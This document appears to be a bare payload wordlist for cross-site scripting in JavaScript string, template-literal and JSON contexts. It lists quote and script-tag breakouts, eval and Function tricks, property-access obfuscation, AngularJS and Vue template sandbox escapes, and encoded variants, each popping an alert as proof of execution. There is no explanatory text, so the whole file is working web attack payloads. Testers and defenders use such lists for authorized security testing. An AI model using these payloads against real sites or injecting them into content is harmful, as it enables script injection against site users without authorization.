# JavaScript string / template context XSS — SOTA

';alert(1)//
";alert(1)//
\';alert(1)//
\";alert(1)//
</script><script>alert(1)</script>
</script><svg/onload=alert(1)>
`-alert(1)-`
${alert(1)}
${confirm(1)}
${prompt(1)}
`;alert(1)//
${`${alert(1)}`}
';eval('alert(1)')//
";eval('alert(1)')//
';Function('alert(1)')()//
";Function('alert(1)')()//

# String concat bypass
';alert(String.fromCharCode(88,83,83))//
';window['alert'](1)//
';self['alert'](1)//
';this['alert'](1)//
';top['alert'](1)//
';parent['alert'](1)//

# Template literal
${7*7}
${alert`1`}
${alert(document.domain)}

# JSON context
\"};alert(1);{//
\"},alert(1),{\"x\":\"
\"-alert(1)-\"

# AngularJS (legacy)
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}

# Vue (legacy)
{{_openBlock.constructor('alert(1)')()}}

# Backtick / comment breakout
`;alert(1);//
`;alert(1);/*
*/alert(1)//

# Unicode / encoding
\u0061lert(1)
\alert(1)
\x3cscript\x3ealert(1)\x3c/script\x3e
